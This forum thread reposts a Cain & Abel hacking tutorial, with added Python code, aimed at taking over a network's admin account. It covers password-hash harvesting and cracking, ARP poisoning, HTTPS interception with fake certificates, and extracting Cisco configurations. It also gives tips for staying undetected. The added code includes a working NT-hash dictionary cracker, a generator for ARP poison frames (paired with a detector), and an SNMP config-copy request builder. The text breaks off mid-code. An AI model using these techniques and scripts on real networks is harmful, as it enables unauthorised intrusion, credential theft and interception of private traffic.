Complete Cain and Able tutorial

Still_Learning
Fame ! Where are the chicks?!
Posts: 1040
Joined: 11 Jun 2008, 16:00
Location: Trigger City

Post by Still_Learning »

Lesson 1:

This tutorial will cover (version 4.9.8)

INTRODUCTION

Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you can’t very well hack a network if you take it down. Proceed with caution.

We need to accomplish the following steps to get the admin account:

1. Enumerate the computers on the network

2. Connect to a computer and install the Abel remote app

3. Harvest user account information

4. Crack user account information passwords to get the admin account

5. Login to the target machine with the admin account

6. Install the Abel service on the target server

7. Harvest all of the hashes from the server and send them to the cracker

Once we have the admin account on the server, the rest is up to you.


First things first: after you launch the application you will need to configure the Sniffer to use the appropriate network card. If you have multiple network cards, it is useful to know the MAC address of your primary connection, or of the one that you will be using for Cain network access. You can determine your MAC address by performing the following steps:

1. Go to “Start”

2. Run

3. Enter “CMD”

4. A black window will appear

5. Enter the following command into the window without the quotes:

“ipconfig /all” and then press Enter

6. Determine which one of the Ethernet adapters you are using and copy its MAC address to Notepad. You will use this to help determine which NIC to select in the Cain application.

With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration dialog box will appear. From the list, select the device with the MAC address of the Ethernet or wireless network card that you will be using for hacking. While we are here, let’s review some of the other tabs and information in the Configuration dialog box. Here is a brief description of each tab and its configuration:

Sniffer Tab: Allows the user to specify the Ethernet interface and the start-up options for the sniffer and ARP features of the application.

ARP Tab: Allows the user, in effect, to lie to the network and tell all of the other hosts that your IP is actually that of a more important host on the network, like a server or router. This feature is useful in that you can impersonate the other device and have all traffic for that device “routed” to your workstation. Keep in mind that servers and routers are designed for multiple high-capacity connections. If the device that you are operating from cannot keep up with the traffic generated by this configuration, the target network will slow down and may even come to a halt. This will surely lead to your detection and eventual demise as a hacker, as the event is easily detected and tracked with the right equipment.

Filters and Ports: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right-click on one of the services you will be able to change both the TCP and UDP ports. This will not be necessary for this tutorial, but will be useful in future tutorials.

HTTP Fields: Several features of the application, such as the LSA Secrets dumper, HTTP Sniffer and APR-HTTPS, will parse the sniffed or stored information from web pages viewed. Simply put, the more fields that you add to the HTTP username and password fields, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.

Traceroute: Trace route, or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, netmask resolution, and Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.

Console: This is the command prompt on the remote machine. Anything that you can do on your PC from the CMD prompt can be done from here. Examples include mapping a drive back to your PC and copying all the files from the target, or adding local users to the local security groups, or anything really. With Windows, everything is possible from the command prompt.

Hashes: Allows for the enumeration of user accounts and their associated hashes, with the further ability to send all harvested information to the cracker.

LSA Secrets: Windows NT and Windows 2000 support cached logon accounts. The operating system default is to cache (store locally) the last 10 passwords. There are registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names and passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computer's secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets

Routes: From this object, you can determine all of the networks that this device is aware of. This can be powerful if the device is multihomed on two different networks.

TCP Table: A simple listing of all of the processes and ports that are running and their TCP session status.

UDP Table: A simple listing of all of the processes and ports that are running and their UDP session status.

Dictionary Cracking – Select all of the hashes and select Dictionary Attack (LM). You could select the NTLM, but the process is slower and, with few exceptions, the NTLM and NT passwords are the same and NT cracks (guesses) faster. In the Dictionary window, you will need to populate the File window with each of your dictionary files. You have to download the tables and copy them to the Cain installation directory. Check the following boxes: As Is Password, Reverse, Lowercase, Uppercase, and Two Numbers.

Dictionary Cracking process

Click Start and watch Cain work. The more lists and words that you have, the longer it will take. When Cain is finished, click Exit and then look at the NT password column. All of the passwords cracked will show up next to the now <insert your name here>-owned accounts.
Take a second to look carefully at the accounts and passwords in the list. Look for patterns like the use of letters and characters in sequence. Many administrators use recurring patterns to help users remember their passwords. Example: Ramius's password reset in November would give a user account of RAMNOV. If you can identify patterns like this you can use word generators to create all possible combinations and shorten the window.

Cryptanalysis attacking

Alright then… Re-sort your hashes to single out the accounts that you have left to crack. Now select all of the un-cracked or un-guessed accounts, right-click on the accounts again and select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click Start. This should go pretty quickly. Take a second to review your progress and look for additional patterns.

At this point, use a program like sam grab that has the ability to determine which accounts are members of the Domain Administrators group to see if you have gotten any admin-level accounts. Once you move to the next step, which is bruting, most of what you have left are long passwords that are going to be difficult and time-consuming. Any time-saver applications that you can find will be helpful.

Bruting

Repeat the same process for selecting the accounts. Here is the first time that you will actually have to use your brain. Bruting can be extremely time-consuming. Look closely at all of the passwords that you have cracked and look for patterns. First, do you see any special characters in any of the passwords cracked? How about numbers? A lot of all upper case or all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The goal is to use the least amount of characters and symbols to get the account that you need.

So let's finish it off. Select all of the un-cracked accounts, follow the previous steps and select Brute Force (LM). The default for LM is A-Z and 0-9. This is due to the nature of LM hashes and the way that they are stored. Another note is that sometimes you will see a “?” or several “????” and then some numbers or letters. This is also due to the nature of NT versus NTLM and the method that NT used to store passwords. If not, see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords and those accounts with an “*” in the <8 field, decide how many characters to specify in the password length pull-down box. Make your selection and have at it. 123749997 years to completion? If you see this, then you should rethink the need for this account. However, working with the application, rainbow tables and password generators can help you narrow down to reasonable time frames to get the job done.

Some definition

MAC: Media Access Control - In computer networking a media access control address (MAC address) is a code on most forms of networking equipment that allows for that device to be uniquely identified. Each manufacturer for Network Cards has been assigned a predefined range or block of numbers.

Sniffing: Sniffing is the act or process of “Listening” to some or all of the information that is being transmitted on the same network segment that a device is on. On an OSI Model Layer 1 network, even the most basic Sniffers are capable of “hearing” all of the traffic that is sent across a LAN. Moving to a Layer 2 network complicates the process somewhat, however tools like Cain allow for the spanning of all ports to allow the exploitation of layer 2 switched networks.

ARP: Address Resolution Protocol – a TCP/IP function for associating an IP address with a link-level address. Understanding ARP and its functions and capabilities is a key skill for hackers and security professionals alike. A basic understanding of ARP is necessary to properly utilize all of the functions that Cain is capable of.

------------
Author: arbu
original link:


www.thehackerslibrary.com
Gone
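A worked example to go with the dictionary-cracking part of Lesson 1. This is added here and is not code from the tutorial or from Cain & Abel: it computes NT hashes (MD4 over the UTF-16LE password, implemented in pure Python because many OpenSSL builds no longer expose MD4 through hashlib) and runs a wordlist through the same mangling rules the post has you tick (As Is, Reverse, Lowercase, Uppercase, Two Numbers; that "two numbers" means appending 00 to 99 is an assumption). The account names and all hashes except the well-known one for “password” are constructed for the example.

```python
"""Dictionary attack against NT hashes with Cain-style mangling rules.

Added example, not code from the tutorial or from Cain & Abel.  The NT hash is
MD4 over the UTF-16LE password; MD4 is implemented here because many OpenSSL
builds no longer expose it through hashlib.  Account names and the hash list
are constructed for this example (the Administrator hash is the well-known
NT hash of "password").
"""
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    x &= _MASK
    return ((x << n) | (x >> (32 - n))) & _MASK


# (boolean function, additive constant, per-step shifts, order of message words)
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
     tuple(range(16))),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
     (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
     (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in _ROUNDS:
            for i, w in enumerate(order):
                a = _rotl(a + fn(b, c, d) + words[w] + k, shifts[i % 4])
                a, b, c, d = d, a, b, c              # rotate the four registers
        h = [(v + r) & _MASK for v, r in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT (a.k.a. NTLM) hash: hex MD4 of the password in UTF-16LE."""
    return md4(password.encode("utf-16-le")).hex()


def mangle(word: str):
    """Candidates in the order of Cain's dictionary options: As Is, Reverse,
    Lowercase, Uppercase, then word + two digits (00-99 is an assumption)."""
    seen = set()
    for cand in (word, word[::-1], word.lower(), word.upper()):
        if cand not in seen:
            seen.add(cand)
            yield cand
    for n in range(100):
        yield f"{word}{n:02d}"


def dictionary_attack(hashes: dict, wordlist) -> dict:
    """hashes maps account -> NT hash hex.  Returns account -> plaintext for hits."""
    pending = {}                                     # hash -> accounts sharing it
    for acct, h in hashes.items():
        pending.setdefault(h.lower(), []).append(acct)
    cracked = {}
    for word in wordlist:
        for cand in mangle(word):
            for acct in pending.pop(nt_hash(cand), []):
                cracked[acct] = cand
            if not pending:
                return cracked
    return cracked


# Constructed sample dump; all but the first hash are computed from the comment.
SAMPLE_HASHES = {
    "Administrator": "8846f7eaee8fb117ad06bdd830b7586c",  # "password"
    "ramius": nt_hash("november"),                        # lowercase rule
    "jsmith": nt_hash("Secret42"),                        # two-numbers rule
    "svc_backup": nt_hash("x9!Qv#2pLw"),                  # stays uncracked
}
SAMPLE_WORDLIST = ["Password", "November", "Secret", "welcome"]

if __name__ == "__main__":
    for acct, pw in dictionary_attack(SAMPLE_HASHES, SAMPLE_WORDLIST).items():
        print(f"{acct:14} {pw}")
```

Run it as a script to print the cracked accounts. Each word expands to at most 104 candidates, so the mangling adds about two orders of magnitude to the wordlist size and no more; that is still a dictionary attack, not the brute force the post moves to afterwards. The LM side of the post cannot be shown without a DES implementation, which is why the example sticks to NT hashes.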


Post by Still_Learning »

Lesson 2:

Author: Arbu

ARP Poison Routing
APR-HTTPS

APR

APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name “ARP Poison Routing” derives from the two steps needed to perform such unusual network sniffing: an ARP Poison Attack and routing packets to the correct destination.

ARP Poison Attack
This kind of attack is based on the manipulation of hosts’ ARP caches. On an Ethernet/IP network, when two hosts want to communicate with each other they must know each other's MAC addresses. The source host looks at its ARP table to see if there is a MAC address corresponding to the destination host IP address. If not, it broadcasts an ARP Request to the entire network asking for the MAC of the destination host. Because this packet is sent in broadcast it will reach every host in the subnet; however, only the host with the IP address specified in the request will reply with its MAC to the source host. On the contrary, if the ARP-IP entry for the destination host is already present in the ARP cache of the source host, that entry will be used without generating ARP traffic.
By manipulating the ARP caches of two hosts, it is possible to change the normal direction of traffic between them. This kind of traffic hijacking is the result of an ARP Poison attack and is also a prerequisite to achieving a “Man-in-the-Middle” condition between victim hosts. The term Man-in-the-Middle refers to the fact that the traffic between hosts follows an obligatory path through something before reaching the desired destination.

Re-Routing Packets
Now suppose that you successfully setup an ARP Poison attack between two hosts to intercept their network traffic. To do so you had specified the sniffer MAC address in ARP Poison packets and now you are forcing the two hosts to communicate through your computer.


In this situation the sniffer receives packets that are directed to its MAC address but not to its IP address so the protocol stack discards these packets causing a Denial of Service between the hosts. To avoid such problems the sniffer must be able to re-route poisoned packets to the correct destination. (You can’t capture any password if hosts cannot communicate)

Prerequisites
In order to re-route poisoned packets to the correct destination, the program must know each IP-MAC association of victim hosts. This is why the user is asked to scan for MAC addresses first.

Configuration
This feature needs the configuration of some parameters that can be set from the configuration dialog. It is possible to specify spoofed MAC and IP addresses to be used in ARP Poison packets; this makes it very difficult to trace back to the origin of the attack because the attacker’s real addresses are never sent across the network. On switched networks, the attack is also a stealthy one from a central point of view because Cain’s APR uses unicast Ethernet destination addresses in ARP Poison packets; these packets will be forwarded by switches according to their CAM tables and never sent in broadcast.

[Image: apr]

Victim hosts can be selected from the APR Tab using the + button in the toolbar:

The meaning of this selection is: “I want to hijack all IP traffic that flows between host 192.168.0.1 and host 192.168.0.10 in each direction, so that my workstation will be in a Man-in-the-Middle condition between them”. In this way the program is configured to perform an ARP Poison attack directed at the selected hosts and at the same time the association needed to re-route poisoned packets is created. Cain’s APR has been developed to handle attacks on multiple hosts at the same time, so you can choose a pool of addresses in the right-hand list.

The attack can now be enabled/disabled using the relative toolbar button;

APR Views
You can monitor the traffic activity from the two views under the APR sub-tab. The upper view (LAN View) shows the number of re-routed packets between poisoned hosts and also the routing direction of the packets. It can happen that for some reason (static ARP entries, for example) the attack is successful for one host only; in this case you will see the number of re-routed packets rising for one direction only, meaning that the sniffer is processing half of the traffic expected.

The lower view (WAN View) shows the number of re-routed packets directed to or coming from an IP address which is external to the current subnet. If one of the two hosts is a router it is possible that Cain’s APR will process WAN traffic too; in this case the lower list will be automatically populated with associations for WAN traffic.

When poisoning a router the following considerations arise:

- If you setup APR to hijack IP traffic between an internal host and its default gateway you will automatically intercept traffic from that host and all other hosts present in external networks connected by that gateway.

- When APR receives a packet originated from an internal host and directed to an IP address which is external to the current subnet it must re-route that packet to the correct gateway which is unknown.
The destination IP address present in the packet is that of an external host and the destination Ethernet address is our sniffer's MAC address… so the question arises as to where to re-route this packet if there are multiple exit points (gateways) in our LAN. The packet could be sent in broadcast, but this works only with routers; I checked that Checkpoint Firewalls, for example, discard packets directed to unicast IP addresses encapsulated in frames with broadcast MAC addresses. When APR does not know where to re-route packets it will use the best route found in the local operating system’s route table.
If your LAN uses asymmetric routing you can modify the local route table using the Route Table Manager to avoid the above problem.

- Poisoning the subnet’s default gateway with all other hosts in the LAN can cause traffic bottlenecks because APR does not have the same performance as a high-speed router.

- Default gateways addresses are usually virtual addresses generated by HSRP or VRRP routing protocols. Consider if you are poisoning a normal host and the default gateway virtual address…
In this case a packet originated outside the local network and directed to an internal host will reach the sniffer, but this packet could contain the real MAC address of the active HSRP/VRRP host as the Ethernet source address. Because this source MAC address is not the one you set up in the APR list, the packet will not be re-routed by APR, causing DoS. When you want to poison HSRP/VRRP virtual addresses you also have to poison the real addresses of the HSRP/VRRP members.
APR WAN Status

[Image: arp-view]

Each entry present in the WAN list can reach the following status:

- Broadcasting: This state means that APR received a packet from a host that resides on a different network and directed to an IP address of your broadcast domain. That packet must be routed by APR but the correct destination MAC address is not present in the host list. In this situation APR will broadcast that packet to all hosts in your LAN.

- Half-Routing: This state means that APR is routing the traffic correctly but only in one direction (ex: Client->Server or Server->Client). This can happen if one of the two hosts cannot be poisoned or if asymmetric routing is used on the LAN. In this state the sniffer loses all packets in an entire direction, so it cannot grab authentications that use a challenge-response mechanism.

- Full-Routing: This state means that the IP traffic between two hosts has been completely hijacked and APR is working in FULL-DUPLEX (e.g.: Server<->Client). The sniffer will grab authentication information according to the filters set.

APR-HTTPS enables the capture and decryption of HTTPS traffic between hosts. It works in conjunction with Cain’s Certificate Collector to inject fake certificates into SSL sessions previously hijacked by means of APR. Using this trick it is possible to decrypt encrypted data before it arrives at the real destination, performing a so-called Man-in-the-Middle attack.


Be warned that clients will notice this kind of attack because the server’s certificate injected into the SSL session is a fake one and, although it is very similar to the real one, it is not signed by a trusted certification authority. When the victim client starts a new HTTPS session, his browser shows a pop-up dialog warning about the problem.

[Image: security alert]

APR-HTTPS uses the certificate files manipulated by the Certificate Collector. They contain the same parameters as the real ones except for the asymmetric encryption keys; this deceives a lot of users into accepting the server certificate and continuing with the session.

[Image: certificate]

The lower list in the APR-HTTPS tab contains all the session files that have been captured during the Man-in-the-Middle attack; decrypted data is saved in these text files located under the “HTTPS” subdirectory of the main installation folder.

[Image: fake certificate]

How it works
Cain’s HTTPS sniffer works in FULL-DUPLEX CLIENT-SIDE STEALTH mode; both server and client traffic is decrypted and, if spoofing is enabled, the attacker’s IP and MAC addresses are never exposed to the victim client. Connections are accepted by a local “acceptor” socket listening on the HTTPS port defined in the configuration dialog; this socket handles hijacked client connections, but only when APR is enabled. OpenSSL libraries are used to manage SSL communications over two more sockets, one used for the traffic between the client and Cain and the other used for the traffic between Cain and the server.

This is how all works step by step:

1) The HTTPS filter is enabled by the user in the configuration dialog
2) APR is enabled by the user using the button on the toolbar -> the Man-in-the-Middle attack is ready
3) The victim client starts a new session to an HTTPS-enabled server (e.g. https://xyz.com)
4) Packets from the client are hijacked by APR and captured by Cain’s sniffer by means of the WinPcap driver
5) APR-HTTPS searches for a fake certificate associated with the requested server in the Certificate Collector; if present, the certificate will be used; if not, it will be automatically downloaded, properly modified and stored locally for future usage.
6) Packets from the victim are modified so that they are redirected to the local acceptor socket; modifications are made on MAC addresses, IP addresses and TCP source ports (Port Address Translation, “PAT”, is used to handle multiple connections). The captured data is then sent again into the network using WinPcap, but this time addressed to the local socket that will accept the client-side connection.
7) The server-side socket is created and connected to the real server requested by the victim.
8) OpenSSL libraries are used to manage encryption on both sockets, using the fake certificate victim-side and the real certificate server-side.
9) Packets sent by the client-side socket are modified again to reach the victim’s host.
10) Data coming from the server is decrypted, saved to session files, re-encrypted and sent to the victim host by means of the client-side socket.
11) Data coming from the client is decrypted, saved to session files, re-encrypted and sent to the server by means of the server-side socket.

Although it can be noticed from the fake certificate file used, this kind of attack is STEALTH from a client point of view because the victim thinks it is connected to the real server; try a “netstat -an” on the client to check for yourself.

Once decrypted, traffic from the client is also sent to the HTTP sniffer filter for a further analysis on credentials. You can take a look at the data saved in session files by APR-HTTPS here.
Prerequisites
This feature needs APR to be enabled and a Man-in-the-Middle condition between the HTTPS server and the victim host.

Limitations
This feature does not work like a PROXY server; because of the usage of the Winpcap driver it cannot decrypt HTTPS sessions initiated from the local host.

Usage
After you successfully set up APR and enabled the HTTPS sniffer filter, sessions are automatically saved in the HTTPS subdirectory and can be viewed using the relative function within the list pop up menu.
Gone
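To make the APR section concrete, here is an added example (not code from the tutorial or from Cain & Abel) that builds the raw Ethernet/ARP frames involved, a normal request/reply followed by the two unicast poisoned replies APR sends to sit between a host and its gateway, and then runs a small detector over the sequence, which is what you would do with a mirror-port capture to catch exactly this attack. All MAC and IP addresses are constructed for the example.

```python
"""ARP Poison Routing, frame by frame.

Added example, not code from the tutorial or from Cain & Abel.  It builds the
raw Ethernet/ARP frames the attack relies on (a normal request/reply, then the
two unicast poisoned replies APR sends) and runs a small detector over the
sequence, the check a defender would run on a mirror-port capture.  All MAC and
IP addresses below are constructed for this example.
"""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST, ZERO_MAC = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"


def _mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def _ip(s: str) -> bytes:
    return bytes(int(o) for o in s.split("."))


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_dst=None):
    """Ethernet II frame (14 bytes) + ARP packet (28 bytes).  Requests go to
    the broadcast MAC; replies are unicast to target_mac, which is exactly
    why switches forward a poisoned reply to one port only."""
    eth_dst = eth_dst or (BROADCAST if op == ARP_REQUEST else target_mac)
    eth = _mac(eth_dst) + _mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)        # Ethernet/IPv4 ARP
    arp += _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Fields of one ARP frame as a dict, or None for non-ARP frames."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {
        "eth_dst": mac(frame[0:6]), "eth_src": mac(frame[6:12]),
        "op": struct.unpack("!H", frame[20:22])[0],
        "sha": mac(frame[22:28]), "spa": ip(frame[28:32]),
        "tha": mac(frame[32:38]), "tpa": ip(frame[38:42]),
    }


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two replies APR emits for one victim<->gateway pair: the victim is
    told the gateway IP lives at the attacker's MAC, and vice versa."""
    return [
        build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip),
        build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip),
    ]


def detect_poisoning(frames):
    """Two rules over a capture: a reply nobody asked for, and a reply that
    changes the MAC already learned for an IP.  Returns alert strings."""
    learned, pending, alerts = {}, set(), []
    for f in filter(None, map(parse_arp, frames)):
        if f["op"] == ARP_REQUEST:
            pending.add((f["sha"], f["tpa"]))                # who asked for what
            continue
        if (f["tha"], f["spa"]) in pending:
            pending.discard((f["tha"], f["spa"]))
        else:
            alerts.append(f"unsolicited reply: {f['spa']} is-at {f['sha']} -> {f['tha']}")
        known = learned.setdefault(f["spa"], f["sha"])
        if known != f["sha"]:
            alerts.append(f"conflict: {f['spa']} was {known}, now claimed by {f['sha']}")
    return alerts


VICTIM_MAC, VICTIM_IP = "00:0c:29:11:22:33", "192.168.0.10"
GATEWAY_MAC, GATEWAY_IP = "00:1a:2b:aa:bb:cc", "192.168.0.1"
ATTACKER_MAC = "00:50:56:de:ad:01"

# Constructed capture: legitimate resolution of the gateway, then the poison.
SAMPLE_CAPTURE = [
    build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, GATEWAY_IP),
    build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
] + poison_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)

if __name__ == "__main__":
    for alert in detect_poisoning(SAMPLE_CAPTURE):
        print(alert)
```

The detector's two rules map directly onto the text: the poisoned reply is unsolicited (nobody asked for 192.168.0.1) and it changes the MAC already learned for the gateway, which is the same observation a static ARP entry or Dynamic ARP Inspection acts on. Because APR uses unicast replies, a detector that only sees broadcast traffic sees nothing; it has to be fed from a mirror port or run on the hosts themselves.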


Post by Still_Learning »

Lesson 3:

Author: Abru

original link


http://www.thehackerslibrary.com/?p=440

-----------------------------------------

This part of the tutorial will contain

Certificates Collector

Cisco Config Downloader/Uploader

Mac Scanner

Certificates Collector

Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is automatically used by the HTTPS sniffer filter, but you can also use it manually to create a list of pre-calculated fake certificate files. Why fake? Because the program will replace the asymmetric encryption keys in these files with new ones generated locally. In this way APR-HTTPS will be able to encrypt/decrypt HTTPS traffic in a Man-in-the-Middle condition between APR’s victim hosts.

A fake certificate is self-signed by Cain, so the client’s browser is supposed to pop up a dialog to notify that it comes from an untrusted certification authority; however, because all other parameters within the certificate remain the same as the real ones, a lot of users simply do not care about this warning.

[Image: certificate] (http://www.thehackerslibrary.com/wp-content/uploads/2008/12/11-259x300.jpg)

Fake certificates are stored in the “Certs” subdirectory of the program’s installation path and the list of those currently available to APR-HTTPS is maintained in the file CERT.LST in the program’s directory. You can manually modify this list file to instruct Cain’s APR-HTTPS to inject the certificate of your choice into connections from APR’s victims computers to a given HTTPS server address.

[Image: fake certificate application] (http://www.thehackerslibrary.com/wp-content/uploads/2008/12/21-300x171.jpg)

Usage

The feature is used automatically by the HTTPS sniffer filter. You can use the + button on the toolbar to manually grab and prepare a list of fake certificates; non standard ports can be specified using the syntax “hostname:port” or “ip address:port”.

Cisco Config Downloader/Uploader

This feature allows you to download or upload the configuration file of Cisco devices via SNMP/TFTP. It supports routers and switches that use the OLD-CISCO-SYSTEM-MIB or the new CISCO-CONFIG-COPY-MIB; for more information about those MIBs please refer to the Cisco web site.

How it works

1) Cain requests the configuration file transfer from the Cisco device using the SNMP protocol. Request packets are constructed using some proprietary Cisco OIDs that the vendor provides for this functionality; they also contain other parameters like the protocol type, the server IP address and filenames to instruct the device on where to send its configuration file to or take it from.

2) At this point the device starts the file transfer using the protocol specified in the request (set to TFTP for simplicity).

3) Cain opens a TFTP socket in listening mode and handles the file transfer. A TFTP server is NOT required, when uploading the program sends the configuration file to the device, when downloading it receives it.

Usage

To download a configuration from a device press the “Insert” button on the keyboard or click the icon with the blue + on the toolbar, provide the IP address of the SNMP enabled device and the right Read/Write Community string. To upload a configuration use the relative function within the list pop up menu.

Limitations

This feature will not work if network restrictions, like ACLs or firewall rules, are set for the protocols involved (SNMP/TFTP). The TFTP file transfer is initiated by the device itself, so dynamic NAT between you and the device is a problem as well.

Requirements

- CCDU works on Cisco Routers and Switches that support the OLD-CISCO-SYSTEM-MIB or the new CISCO-CONFIG-COPY-MIB. PIX Firewalls do not support those MIBs.

- You also need the right Read/Write SNMP community string (e.g.: “private”), the Read-Only one is not enough.

MAC Scanner

The MAC address scanner is a very fast IP-to-MAC address resolver based on ARP Request/Reply packets. It takes as input a range of IP addresses on the current subnet and resolves the MAC addresses associated with those IPs. The scanner includes an OUI database providing MAC vendor information; this feature is useful to quickly identify switches, routers, load balancers and firewalls present in the LAN.

[Image: mac-scanner] (http://www.thehackerslibrary.com/wp-content/uploads/2008/12/mac-scanner-300x144.jpg)

Because of the use of ARP packets that cannot cross routers or VLANs, this feature can resolve MAC addresses in the local broadcast domain only. The OUI database is a normalized version of the IEEE OUI list available at this link: http://standards.ieee.org/regauth/oui/index.shtml.

Once active hosts are found, you can also resolve their host names with the “Resolve Host Name” function within the list pop up menu.
Tip

The scanner cannot resolve MAC addresses if the network card is not correctly configured. You also have to check the APR’s spoofing options in the configuration dialog before initiating a scan.
Prerequisites

The sniffer must be activated.
Usage

The scanner’s configuration dialog is activated by pressing the “Insert” button on the keyboard or clicking the icon with the blue + on the toolbar; then you have to select the range of IP addresses to resolve.

CREDITS-CAIN and ABEL ITSELF
Gone
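For the Cisco Config Downloader section, an added example (not code from the tutorial or from Cain & Abel) that hand-encodes, in BER, the SNMPv1 SetRequest a tool has to send to make a device copy its running-config to a TFTP server via CISCO-CONFIG-COPY-MIB, i.e. step 1 of the "How it works" list above. The column OIDs under ccCopyEntry (1.3.6.1.4.1.9.9.96.1.1.1.1) and the enumeration values are the MIB's published ones; the row index 333, the TFTP server address, the filename and the community string are constructed. Nothing is sent on the wire: the bytes are what goes into a UDP/161 datagram and, from the defender's side, what an IDS signature should match.

```python
"""SNMP SetRequest for CISCO-CONFIG-COPY-MIB, encoded by hand.

Added example, not code from the tutorial or from Cain & Abel.  It produces the
SNMPv1 SET that tells a Cisco device to copy its running-config to a TFTP
server.  The OIDs and enum values are the MIB's published ones; the row index
(333), TFTP server address, filename and community string are constructed.
Nothing is sent on the wire.
"""

CC_COPY_ENTRY = "1.3.6.1.4.1.9.9.96.1.1.1.1"   # ccCopyEntry; columns below
COL_PROTOCOL, COL_SRC_TYPE, COL_DST_TYPE = 2, 3, 4
COL_SERVER_ADDR, COL_FILENAME, COL_ROW_STATUS = 5, 6, 14
TFTP, RUNNING_CONFIG, NETWORK_FILE, CREATE_AND_GO = 1, 4, 1, 4


def encode_length(n: int) -> bytes:
    """BER length: short form below 128, long form (0x8N + N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + encode_length(len(body)) + body


def encode_integer(v: int) -> bytes:
    # Shortest two's-complement encoding (adds a leading 0x00 when bit 7 is set).
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def encode_octet_string(s) -> bytes:
    return tlv(0x04, s if isinstance(s, bytes) else s.encode())


def encode_ipaddress(ip: str) -> bytes:
    return tlv(0x40, bytes(int(o) for o in ip.split(".")))   # APPLICATION 0


def encode_oid(oid: str) -> bytes:
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])   # first two arcs share a byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]                    # base-128, high bit = "more"
        while arc > 0x7F:
            arc >>= 7
            chunk.insert(0, 0x80 | (arc & 0x7F))
        out += bytes(chunk)
    return tlv(0x06, bytes(out))


def config_copy_varbinds(index: int, tftp_server: str, filename: str):
    """One ccCopyEntry row: protocol, source, destination, server, file, then
    RowStatus createAndGo(4), which is what actually triggers the copy."""
    col = lambda c: f"{CC_COPY_ENTRY}.{c}.{index}"
    return [
        (col(COL_PROTOCOL), encode_integer(TFTP)),
        (col(COL_SRC_TYPE), encode_integer(RUNNING_CONFIG)),
        (col(COL_DST_TYPE), encode_integer(NETWORK_FILE)),
        (col(COL_SERVER_ADDR), encode_ipaddress(tftp_server)),
        (col(COL_FILENAME), encode_octet_string(filename)),
        (col(COL_ROW_STATUS), encode_integer(CREATE_AND_GO)),
    ]


def build_set_request(community: str, varbinds, request_id: int = 1) -> bytes:
    """Message ::= SEQUENCE { version INTEGER(0 = v1), community, SetRequest-PDU }"""
    vb_list = tlv(0x30, b"".join(tlv(0x30, encode_oid(o) + v) for o, v in varbinds))
    pdu = tlv(0xA3, encode_integer(request_id) + encode_integer(0)   # error-status
              + encode_integer(0) + vb_list)                          # error-index
    return tlv(0x30, encode_integer(0) + encode_octet_string(community) + pdu)


def looks_like_config_copy(datagram: bytes) -> bool:
    """Cheap triage rule: a SetRequest PDU that carries any ccCopyEntry OID."""
    arcs = encode_oid(CC_COPY_ENTRY)[2:]     # drop tag+length, keep the arc bytes
    return b"\xa3" in datagram and arcs in datagram


if __name__ == "__main__":
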